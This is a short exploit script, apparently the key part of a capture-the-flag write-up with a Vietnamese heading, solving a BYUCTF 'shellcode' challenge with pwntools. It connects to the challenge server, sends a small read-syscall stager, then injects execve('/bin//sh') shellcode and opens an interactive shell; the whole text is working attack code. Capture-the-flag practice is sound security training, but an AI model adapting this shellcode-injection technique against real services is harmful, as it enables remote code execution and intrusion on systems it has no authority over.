Phแบงn mแบฅu chแปt cแปงa bร i:
from pwn import *
elf = context.binary = ELF("./shellcode")
r = elf.process()
r = remote("byuctf.xyz", 40017)
#gdb.attach(r,'''b*main+341\nc\nb*0x777777000\nc''')
r.sendlineafter(b"Enter first 10 bytes of shellcode:", b"\x48\x89\xD6\x0F\x05") #0x7fffffffde90 : mov [rsp] --> rdx : execve sys_read
r.sendlineafter(b"Enter second 10 bytes of shellcode:", b"\x00") #<--- mov 10 byte to 0x777777000 + 20
r.sendlineafter(b"Enter third 10 bytes of shellcode:", b"\x00") #<--- mov 10 byte to 0x777777000 + 40
r.sendlineafter(b"Enter last 10 bytes of shellcode:", b"\x00") #<-- mov 10 byte to 0x777777000 + 60
shellcode = b"\x48\x31\xFF\x57\x48\xBF\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x57\x48\x31\xF6\x48\x31\xD2\x48\x89\xE7\x48\x31\xC0\x48\x83\xC0\x3B\x0F\x05"
payload = b"A" * 5 #<--- padding
payload += b"\x48\x31\xF6" #<--- clear [rsi]: 0x777777000
payload += shellcode #<--- sendshellcode to exploit
r.sendline(payload)
r.interactive()
